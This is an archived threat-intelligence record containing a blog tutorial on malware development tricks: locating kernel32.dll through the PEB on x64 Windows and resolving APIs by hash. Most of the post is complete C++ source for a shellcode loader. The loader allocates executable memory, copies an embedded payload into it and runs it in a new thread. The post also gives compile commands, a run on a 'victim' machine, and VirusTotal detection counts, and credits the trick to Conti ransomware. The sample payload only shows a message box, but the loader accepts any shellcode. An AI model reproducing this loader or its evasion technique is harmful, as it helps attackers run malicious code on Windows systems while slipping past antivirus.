{
	"id": "13d7cff9-99d9-4f1b-bb2a-7cae527feb70",
	"created_at": "2026-04-06T01:31:09.096688Z",
	"updated_at": "2026-04-10T03:20:23.371377Z",
	"deleted_at": null,
	"sha1_hash": "b697d911e75ad3682a936ec7b6a45284c5d34989",
	"title": "Malware development tricks. Find kernel32.dll base: asm style. C++ example.",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1558414,
	"plain_text": "Malware development tricks. Find kernel32.dll base: asm style. C++\r\nexample.\r\nBy cocomelonc\r\nPublished: 2022-04-02 · Archived: 2026-04-06 00:48:11 UTC\r\n5 minute read\r\n﷽\r\nHello, cybersecurity enthusiasts and white hackers!\r\nThis post is the result of my self research into interesting trick in real-life malware.\r\nIn the one of my previous posts I wrote about using GetModuleHandle . It is returns a handle a specified DLL. For\r\nexample:\r\n#include \u003cwindows.h\u003e\r\nLPVOID (WINAPI * pVirtualAlloc)(LPVOID lpAddress, SIZE_T dwSize, DWORD flAllocationType, DWORD flProtect);\r\n//...\r\nhttps://cocomelonc.github.io/tutorial/2022/04/02/malware-injection-18.html\r\nPage 1 of 11\n\nint main() {\r\n DWORD oldprotect = 0;\r\n HMODULE hk32 = GetModuleHandle(\"kernel32.dll\");\r\n pVirtualAlloc = GetProcAddress(hk32, \"VirtualAlloc\");\r\n //...\r\n return 0;\r\n}\r\nThen, the actual way to execute shellcode is something like this ( meow.cpp ):\r\n#include \u003cwindows.h\u003e\r\nLPVOID (WINAPI * pVirtualAlloc)(LPVOID lpAddress, SIZE_T dwSize, DWORD flAllocationType, DWORD flProtect);\r\nunsigned char my_payload[] =\r\n\"\\xfc\\x48\\x81\\xe4\\xf0\\xff\\xff\\xff\\xe8\\xd0\\x00\\x00\\x00\\x41\"\r\n\"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\"\r\n\"\\x3e\\x48\\x8b\\x52\\x18\\x3e\\x48\\x8b\\x52\\x20\\x3e\\x48\\x8b\\x72\"\r\n\"\\x50\\x3e\\x48\\x0f\\xb7\\x4a\\x4a\\x4d\\x31\\xc9\\x48\\x31\\xc0\\xac\"\r\n\"\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\\xe2\"\r\n\"\\xed\\x52\\x41\\x51\\x3e\\x48\\x8b\\x52\\x20\\x3e\\x8b\\x42\\x3c\\x48\"\r\n\"\\x01\\xd0\\x3e\\x8b\\x80\\x88\\x00\\x00\\x00\\x48\\x85\\xc0\\x74\\x6f\"\r\n\"\\x48\\x01\\xd0\\x50\\x3e\\x8b\\x48\\x18\\x3e\\x44\\x8b\\x40\\x20\\x49\"\r\n\"\\x01\\xd0\\xe3\\x5c\\x48\\xff\\xc9\\x3e\\x41\\x8b\\x34\\x88\\x48\\x01\"\r\n\"\\xd6\\x4d\\x31\\xc9\\x48\\x31\\xc0\\xac\\x41\\xc1\\xc9\\x0d\\x41\\x01\"\r\n\"\\xc1\\x38\\xe0\\x75\\xf1\\x3e\\x4c\\x03\\x4c\\x24\\x08\\x45\\x39\\xd1\"\r\n\"\\x75\\xd6\\x58\\x3e\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\\x3e\\x41\"\r\n\"\\x8b\\x0c\\x48\\x3e\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x3e\\x41\\x8b\"\r\n\"\\x04\\x88\\x48\\x01\\xd0\\x41\\x58\\x41\\x58\\x5e\\x59\\x5a\\x41\\x58\"\r\n\"\\x41\\x59\\x41\\x5a\\x48\\x83\\xec\\x20\\x41\\x52\\xff\\xe0\\x58\\x41\"\r\n\"\\x59\\x5a\\x3e\\x48\\x8b\\x12\\xe9\\x49\\xff\\xff\\xff\\x5d\\x49\\xc7\"\r\n\"\\xc1\\x00\\x00\\x00\\x00\\x3e\\x48\\x8d\\x95\\x1a\\x01\\x00\\x00\\x3e\"\r\n\"\\x4c\\x8d\\x85\\x25\\x01\\x00\\x00\\x48\\x31\\xc9\\x41\\xba\\x45\\x83\"\r\n\"\\x56\\x07\\xff\\xd5\\xbb\\xe0\\x1d\\x2a\\x0a\\x41\\xba\\xa6\\x95\\xbd\"\r\n\"\\x9d\\xff\\xd5\\x48\\x83\\xc4\\x28\\x3c\\x06\\x7c\\x0a\\x80\\xfb\\xe0\"\r\n\"\\x75\\x05\\xbb\\x47\\x13\\x72\\x6f\\x6a\\x00\\x59\\x41\\x89\\xda\\xff\"\r\n\"\\xd5\\x4d\\x65\\x6f\\x77\\x2d\\x6d\\x65\\x6f\\x77\\x21\\x00\\x3d\\x5e\"\r\n\"\\x2e\\x2e\\x5e\\x3d\\x00\";\r\nint main() {\r\n HMODULE hk32 = GetModuleHandle(\"kernel32.dll\");\r\n pVirtualAlloc = GetProcAddress(hk32, \"VirtualAlloc\");\r\n PVOID lb = pVirtualAlloc(0, sizeof(my_payload), MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);\r\nhttps://cocomelonc.github.io/tutorial/2022/04/02/malware-injection-18.html\r\nPage 2 of 11\n\nmemcpy(lb, my_payload, sizeof(my_payload));\r\n HANDLE th = CreateThread(0, 0, (PTHREAD_START_ROUTINE)exec_mem, 0, 0, 0);\r\n WaitForSingleObject(th, -1);\r\n}\r\nSo this code contains very basic logic for executing payload. In this case, for simplicity, it’s use “meow-meow”\r\nmessagebox payload.\r\nLet’s compile it:\r\nx86_64-w64-mingw32-g++ meow.cpp -o meow.exe -mconsole -I/usr/share/mingw-w64/include/ -s -ffunction-sections -fdata\r\nand run:\r\nWe used GetModuleHandle function to locate kernel32.dll in memory. It’s possible to go around this by finding\r\nlibrary location in the PEB.\r\nassembly way :)Permalink\r\nhttps://cocomelonc.github.io/tutorial/2022/04/02/malware-injection-18.html\r\nPage 3 of 11\n\nIn the one of the previous posts I wrote about TEB and PEB structures and I found kernel32 via asm. The\r\nfollowing is obtained:\r\n1. offset to the PEB struct is 0x030\r\n2. offset to LDR within PEB is 0x00c\r\n3. offset to InMemoryOrderModuleList is 0x014\r\n4. 1st loaded module is our .exe\r\n5. 2nd loaded module is ntdll.dll\r\n6. 3rd loaded module is kernel32.dll\r\n7. 4th loaded module is kernelbase.dll\r\nToday I will consider x64 architecture. Offsets are different:\r\n1. PEB address is located at an address relative to GS register: GS:[0x60]\r\n2. offset to LDR within PEB is 0x18\r\n3. kernel32.dll base address at 0x10\r\npractical examplePermalink\r\nSo:\r\nstatic HMODULE getKernel32(DWORD myHash) {\r\n HMODULE kernel32;\r\n INT_PTR peb = __readgsqword(0x60);\r\n auto modList = 0x18;\r\n auto modListFlink = 0x18;\r\n auto kernelBaseAddr = 0x10;\r\n auto mdllist = *(INT_PTR*)(peb + modList);\r\n auto mlink = *(INT_PTR*)(mdllist + modListFlink);\r\n auto krnbase = *(INT_PTR*)(mlink + kernelBaseAddr);\r\n auto mdl = (LDR_MODULE*)mlink;\r\n do {\r\n mdl = (LDR_MODULE*)mdl-\u003ee[0].Flink;\r\n if (mdl-\u003ebase != nullptr) {\r\n if (calcMyHashBase(mdl) == myHash) { // kernel32.dll hash\r\n break;\r\n }\r\n }\r\n } while (mlink != (INT_PTR)mdl);\r\n kernel32 = (HMODULE)mdl-\u003ebase;\r\n return kernel32;\r\n}\r\nThen for finding GetProcAddress and GetModuleHandle I used my getAPIAddr function from my post:\r\nhttps://cocomelonc.github.io/tutorial/2022/04/02/malware-injection-18.html\r\nPage 4 of 11\n\nstatic LPVOID getAPIAddr(HMODULE h, DWORD myHash) {\r\n PIMAGE_DOS_HEADER img_dos_header = (PIMAGE_DOS_HEADER)h;\r\n PIMAGE_NT_HEADERS img_nt_header = (PIMAGE_NT_HEADERS)((LPBYTE)h + img_dos_header-\u003ee_lfanew);\r\n PIMAGE_EXPORT_DIRECTORY img_edt = (PIMAGE_EXPORT_DIRECTORY)(\r\n (LPBYTE)h + img_nt_header-\u003eOptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress);\r\n PDWORD fAddr = (PDWORD)((LPBYTE)h + img_edt-\u003eAddressOfFunctions);\r\n PDWORD fNames = (PDWORD)((LPBYTE)h + img_edt-\u003eAddressOfNames);\r\n PWORD fOrd = (PWORD)((LPBYTE)h + img_edt-\u003eAddressOfNameOrdinals);\r\n for (DWORD i = 0; i \u003c img_edt-\u003eAddressOfFunctions; i++) {\r\n LPSTR pFuncName = (LPSTR)((LPBYTE)h + fNames[i]);\r\n if (calcMyHash(pFuncName) == myHash) {\r\n printf(\"successfully found! %s - %d\\n\", pFuncName, myHash);\r\n return (LPVOID)((LPBYTE)h + fAddr[fOrd[i]]);\r\n }\r\n }\r\n return nullptr;\r\n}\r\nAnd, respectively, the main() function logic is different:\r\nint main() {\r\n HMODULE mod = getKernel32(56369259);\r\n fnGetModuleHandleA myGetModuleHandleA = (fnGetModuleHandleA)getAPIAddr(mod, 4038080516);\r\n fnGetProcAddress myGetProcAddress = (fnGetProcAddress)getAPIAddr(mod, 448915681);\r\n HMODULE hk32 = myGetModuleHandleA(\"kernel32.dll\");\r\n fnVirtualAlloc myVirtualAlloc = (fnVirtualAlloc)myGetProcAddress(hk32, \"VirtualAlloc\");\r\n fnCreateThread myCreateThread = (fnCreateThread)myGetProcAddress(hk32, \"CreateThread\");\r\n fnWaitForSingleObject myWaitForSingleObject = (fnWaitForSingleObject)myGetProcAddress(hk32, \"WaitForSingleObject\")\r\n PVOID lb = myVirtualAlloc(0, sizeof(my_payload), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);\r\n memcpy(lb, my_payload, sizeof(my_payload));\r\n HANDLE th = myCreateThread(NULL, 0, (PTHREAD_START_ROUTINE)lb, NULL, 0, NULL);\r\n myWaitForSingleObject(th, INFINITE);\r\n}\r\nAs you can see, I used Win32 API call by hash trick.\r\nThen full source code ( hack.cpp ) is:\r\n/*\r\n * hack.cpp - find kernel32 from PEB, assembly style. C++ implementation\r\n * @cocomelonc\r\n * https://cocomelonc.github.io/tutorial/2022/04/02/malware-injection-18.html\r\n*/\r\nhttps://cocomelonc.github.io/tutorial/2022/04/02/malware-injection-18.html\r\nPage 5 of 11\n\n#include \u003cwindows.h\u003e\r\n#include \u003cstdio.h\u003e\r\ntypedef struct _UNICODE_STRING {\r\n USHORT Length;\r\n USHORT MaximumLength;\r\n PWSTR Buffer;\r\n} UNICODE_STRING;\r\nstruct LDR_MODULE {\r\n LIST_ENTRY e[3];\r\n HMODULE base;\r\n void* entry;\r\n UINT size;\r\n UNICODE_STRING dllPath;\r\n UNICODE_STRING dllname;\r\n};\r\ntypedef HMODULE(WINAPI *fnGetModuleHandleA)(\r\n LPCSTR lpModuleName\r\n);\r\ntypedef FARPROC(WINAPI *fnGetProcAddress)(\r\n HMODULE hModule,\r\n LPCSTR lpProcName\r\n);\r\ntypedef PVOID(WINAPI *fnVirtualAlloc)(\r\n LPVOID lpAddress,\r\n SIZE_T dwSize,\r\n DWORD flAllocationType,\r\n DWORD flProtect\r\n);\r\ntypedef PVOID(WINAPI *fnCreateThread)(\r\n LPSECURITY_ATTRIBUTES lpThreadAttributes,\r\n SIZE_T dwStackSize,\r\n LPTHREAD_START_ROUTINE lpStartAddress,\r\n LPVOID lpParameter,\r\n DWORD dwCreationFlags,\r\n LPDWORD lpThreadId\r\n);\r\ntypedef PVOID(WINAPI *fnWaitForSingleObject)(\r\n HANDLE hHandle,\r\n DWORD dwMilliseconds\r\n);\r\nDWORD calcMyHash(char* data) {\r\nhttps://cocomelonc.github.io/tutorial/2022/04/02/malware-injection-18.html\r\nPage 6 of 11\n\nDWORD hash = 0x35;\r\n for (int i = 0; i \u003c strlen(data); i++) {\r\n hash += data[i] + (hash \u003c\u003c 1);\r\n }\r\n return hash;\r\n}\r\nstatic DWORD calcMyHashBase(LDR_MODULE* mdll) {\r\n char name[64];\r\n size_t i = 0;\r\n while (mdll-\u003edllname.Buffer[i] \u0026\u0026 i \u003c sizeof(name) - 1) {\r\n name[i] = (char)mdll-\u003edllname.Buffer[i];\r\n i++;\r\n }\r\n name[i] = 0;\r\n return calcMyHash((char *)CharLowerA(name));\r\n}\r\nstatic HMODULE getKernel32(DWORD myHash) {\r\n HMODULE kernel32;\r\n INT_PTR peb = __readgsqword(0x60);\r\n auto modList = 0x18;\r\n auto modListFlink = 0x18;\r\n auto kernelBaseAddr = 0x10;\r\n auto mdllist = *(INT_PTR*)(peb + modList);\r\n auto mlink = *(INT_PTR*)(mdllist + modListFlink);\r\n auto krnbase = *(INT_PTR*)(mlink + kernelBaseAddr);\r\n auto mdl = (LDR_MODULE*)mlink;\r\n do {\r\n mdl = (LDR_MODULE*)mdl-\u003ee[0].Flink;\r\n if (mdl-\u003ebase != nullptr) {\r\n if (calcMyHashBase(mdl) == myHash) { // kernel32.dll hash\r\n break;\r\n }\r\n }\r\n } while (mlink != (INT_PTR)mdl);\r\n kernel32 = (HMODULE)mdl-\u003ebase;\r\n return kernel32;\r\n}\r\nstatic LPVOID getAPIAddr(HMODULE h, DWORD myHash) {\r\n PIMAGE_DOS_HEADER img_dos_header = (PIMAGE_DOS_HEADER)h;\r\n PIMAGE_NT_HEADERS img_nt_header = (PIMAGE_NT_HEADERS)((LPBYTE)h + img_dos_header-\u003ee_lfanew);\r\n PIMAGE_EXPORT_DIRECTORY img_edt = (PIMAGE_EXPORT_DIRECTORY)(\r\n (LPBYTE)h + img_nt_header-\u003eOptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress);\r\n PDWORD fAddr = (PDWORD)((LPBYTE)h + img_edt-\u003eAddressOfFunctions);\r\nhttps://cocomelonc.github.io/tutorial/2022/04/02/malware-injection-18.html\r\nPage 7 of 11\n\nPDWORD fNames = (PDWORD)((LPBYTE)h + img_edt-\u003eAddressOfNames);\r\n PWORD fOrd = (PWORD)((LPBYTE)h + img_edt-\u003eAddressOfNameOrdinals);\r\n for (DWORD i = 0; i \u003c img_edt-\u003eAddressOfFunctions; i++) {\r\n LPSTR pFuncName = (LPSTR)((LPBYTE)h + fNames[i]);\r\n if (calcMyHash(pFuncName) == myHash) {\r\n printf(\"successfully found! %s - %d\\n\", pFuncName, myHash);\r\n return (LPVOID)((LPBYTE)h + fAddr[fOrd[i]]);\r\n }\r\n }\r\n return nullptr;\r\n}\r\nunsigned char my_payload[] =\r\n\"\\xfc\\x48\\x81\\xe4\\xf0\\xff\\xff\\xff\\xe8\\xd0\\x00\\x00\\x00\\x41\"\r\n\"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\"\r\n\"\\x3e\\x48\\x8b\\x52\\x18\\x3e\\x48\\x8b\\x52\\x20\\x3e\\x48\\x8b\\x72\"\r\n\"\\x50\\x3e\\x48\\x0f\\xb7\\x4a\\x4a\\x4d\\x31\\xc9\\x48\\x31\\xc0\\xac\"\r\n\"\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\\xe2\"\r\n\"\\xed\\x52\\x41\\x51\\x3e\\x48\\x8b\\x52\\x20\\x3e\\x8b\\x42\\x3c\\x48\"\r\n\"\\x01\\xd0\\x3e\\x8b\\x80\\x88\\x00\\x00\\x00\\x48\\x85\\xc0\\x74\\x6f\"\r\n\"\\x48\\x01\\xd0\\x50\\x3e\\x8b\\x48\\x18\\x3e\\x44\\x8b\\x40\\x20\\x49\"\r\n\"\\x01\\xd0\\xe3\\x5c\\x48\\xff\\xc9\\x3e\\x41\\x8b\\x34\\x88\\x48\\x01\"\r\n\"\\xd6\\x4d\\x31\\xc9\\x48\\x31\\xc0\\xac\\x41\\xc1\\xc9\\x0d\\x41\\x01\"\r\n\"\\xc1\\x38\\xe0\\x75\\xf1\\x3e\\x4c\\x03\\x4c\\x24\\x08\\x45\\x39\\xd1\"\r\n\"\\x75\\xd6\\x58\\x3e\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\\x3e\\x41\"\r\n\"\\x8b\\x0c\\x48\\x3e\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x3e\\x41\\x8b\"\r\n\"\\x04\\x88\\x48\\x01\\xd0\\x41\\x58\\x41\\x58\\x5e\\x59\\x5a\\x41\\x58\"\r\n\"\\x41\\x59\\x41\\x5a\\x48\\x83\\xec\\x20\\x41\\x52\\xff\\xe0\\x58\\x41\"\r\n\"\\x59\\x5a\\x3e\\x48\\x8b\\x12\\xe9\\x49\\xff\\xff\\xff\\x5d\\x49\\xc7\"\r\n\"\\xc1\\x00\\x00\\x00\\x00\\x3e\\x48\\x8d\\x95\\x1a\\x01\\x00\\x00\\x3e\"\r\n\"\\x4c\\x8d\\x85\\x25\\x01\\x00\\x00\\x48\\x31\\xc9\\x41\\xba\\x45\\x83\"\r\n\"\\x56\\x07\\xff\\xd5\\xbb\\xe0\\x1d\\x2a\\x0a\\x41\\xba\\xa6\\x95\\xbd\"\r\n\"\\x9d\\xff\\xd5\\x48\\x83\\xc4\\x28\\x3c\\x06\\x7c\\x0a\\x80\\xfb\\xe0\"\r\n\"\\x75\\x05\\xbb\\x47\\x13\\x72\\x6f\\x6a\\x00\\x59\\x41\\x89\\xda\\xff\"\r\n\"\\xd5\\x4d\\x65\\x6f\\x77\\x2d\\x6d\\x65\\x6f\\x77\\x21\\x00\\x3d\\x5e\"\r\n\"\\x2e\\x2e\\x5e\\x3d\\x00\";\r\nint main() {\r\n HMODULE mod = getKernel32(56369259);\r\n fnGetModuleHandleA myGetModuleHandleA = (fnGetModuleHandleA)getAPIAddr(mod, 4038080516);\r\n fnGetProcAddress myGetProcAddress = (fnGetProcAddress)getAPIAddr(mod, 448915681);\r\n HMODULE hk32 = myGetModuleHandleA(\"kernel32.dll\");\r\n fnVirtualAlloc myVirtualAlloc = (fnVirtualAlloc)myGetProcAddress(hk32, \"VirtualAlloc\");\r\n fnCreateThread myCreateThread = (fnCreateThread)myGetProcAddress(hk32, \"CreateThread\");\r\n fnWaitForSingleObject myWaitForSingleObject = (fnWaitForSingleObject)myGetProcAddress(hk32, \"WaitForSingleObject\")\r\nhttps://cocomelonc.github.io/tutorial/2022/04/02/malware-injection-18.html\r\nPage 8 of 11\n\nPVOID lb = myVirtualAlloc(0, sizeof(my_payload), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);\r\n memcpy(lb, my_payload, sizeof(my_payload));\r\n HANDLE th = myCreateThread(NULL, 0, (PTHREAD_START_ROUTINE)lb, NULL, 0, NULL);\r\n myWaitForSingleObject(th, INFINITE);\r\n}\r\nAs you can see, I used the same hash algorithm.\r\ndemoPermalink\r\nLet’s go to compile it:\r\nx86_64-w64-mingw32-g++ hack.cpp -o hack.exe -mconsole -I/usr/share/mingw-w64/include/ -s -ffunction-sections -fdata\r\nand run (on victim’s windows 10 x64 machine):\r\n.\\hack.exe\r\nhttps://cocomelonc.github.io/tutorial/2022/04/02/malware-injection-18.html\r\nPage 9 of 11\n\nAs you can see, everything is worked perfectly :)\r\nLet’s go to upload to VirusTotal:\r\nhttps://www.virustotal.com/gui/file/0f5204336b3250fe2756b0a675013099be58f99a522e3e14161c1709275ec2d5/detection\r\nSo 6 of 69 AV engines detect our file as malicious\r\nThis tricks can be used to make the static analysis of our malware slightly harder, mainly focusing on PE format and\r\ncommon indicators.\r\nhttps://cocomelonc.github.io/tutorial/2022/04/02/malware-injection-18.html\r\nPage 10 of 11\n\nI saw this trick in the source code of Conti ransomware\r\nI hope this post spreads awareness to the blue teamers of this interesting technique, and adds a weapon to the red\r\nteamers arsenal.\r\nPEB structure\r\nTEB structure\r\nPEB_LDR_DATA structure\r\nGetModuleHandleA\r\nGetProcAddress\r\nwindows shellcoding - part 1\r\nwindows shellcoding - find kernel32\r\nConti ransomware source code\r\nsource code in Github\r\nThis is a practical case for educational purposes only.\r\nThanks for your time happy hacking and good bye!\r\nPS. All drawings and screenshots are mine\r\nSource: https://cocomelonc.github.io/tutorial/2022/04/02/malware-injection-18.html\r\nhttps://cocomelonc.github.io/tutorial/2022/04/02/malware-injection-18.html\r\nPage 11 of 11",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://cocomelonc.github.io/tutorial/2022/04/02/malware-injection-18.html"
	],
	"report_names": [
		"malware-injection-18.html"
	],
	"threat_actors": [],
	"ts_created_at": 1775439069,
	"ts_updated_at": 1775791223,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/b697d911e75ad3682a936ec7b6a45284c5d34989.pdf",
		"text": "https://archive.orkl.eu/b697d911e75ad3682a936ec7b6a45284c5d34989.txt",
		"img": "https://archive.orkl.eu/b697d911e75ad3682a936ec7b6a45284c5d34989.jpg"
	}
}